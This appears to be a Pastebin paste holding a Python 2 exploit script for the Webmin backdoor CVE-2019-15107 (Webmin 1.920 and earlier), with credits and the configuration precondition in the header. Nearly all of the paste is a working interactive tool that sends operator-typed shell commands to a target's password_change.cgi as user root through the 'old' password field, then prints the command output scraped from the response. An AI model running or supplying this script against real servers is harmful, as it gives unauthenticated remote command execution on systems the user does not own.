ontosys

CVE-2019-15107

Feb 28th, 2020
26
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit Title: Webmin backdoor CVE-2019-15107 (RCE)
  2. # Exploit author : chako
  3. # Date: 2019-12-29
  4. # Software Link: http://www.webmin.com/download.html (Webmin <= 1.920)
  5. # Vuln Reported by: AkkuS
  6. # Original Post: https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
  7. #                https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107
  8. #
  9. # "Webmin installation must have Webmin -> Webmin Configuration -> Authentication ->
  10. # Password expiry policy set to Prompt users with expired passwords to enter a new one.
  11. # This option is not set by default, but if it is set, it allows remote code execution."
  12. # ---- ( https://www.virtualmin.com/node/66890 )
  13.  
  14. #!/usr/bin/python
  15. import requests
  16. import sys
  17. import re
  18.  
  19. #target = "https://192.168.1.84:10000/password_change.cgi"
  20.  
  21. if len(sys.argv)>=2:
  22.     target = "https://"+sys.argv[1]+":10000/password_change.cgi"
  23.     cmd = raw_input("Command># ")
  24. else:
  25.     print "\nUsage: python .\webmin.py [Target IP]\n"
  26.     exit()
  27.  
  28. while cmd != "exit" :
  29.     client = requests.session()
  30.     requests.packages.urllib3.disable_warnings()
  31.     payload = {'user':'root','pam':'','expired':'2','expired':'2','old':cmd,'new1':'opgg','new2':'opgg'}
  32.     response = client.post(target, verify=False, data=payload,headers=dict(Referer=target))
  33.    
  34.     if response.ok:    
  35.         x = re.search("(is incorrect)(.*)<\/h3><\/center>", response.text.encode("utf-8"), flags=re.DOTALL)
  36.         if (x):
  37.             print x.group().replace("</h3></center>","").replace("is incorrect","")
  38.         else:
  39.             print("No match")
  40.     else:
  41.         print "error code --> ",response.status_code
  42.        
  43.     cmd = raw_input("Command># ")
  44.     print cmd
RAW Paste Data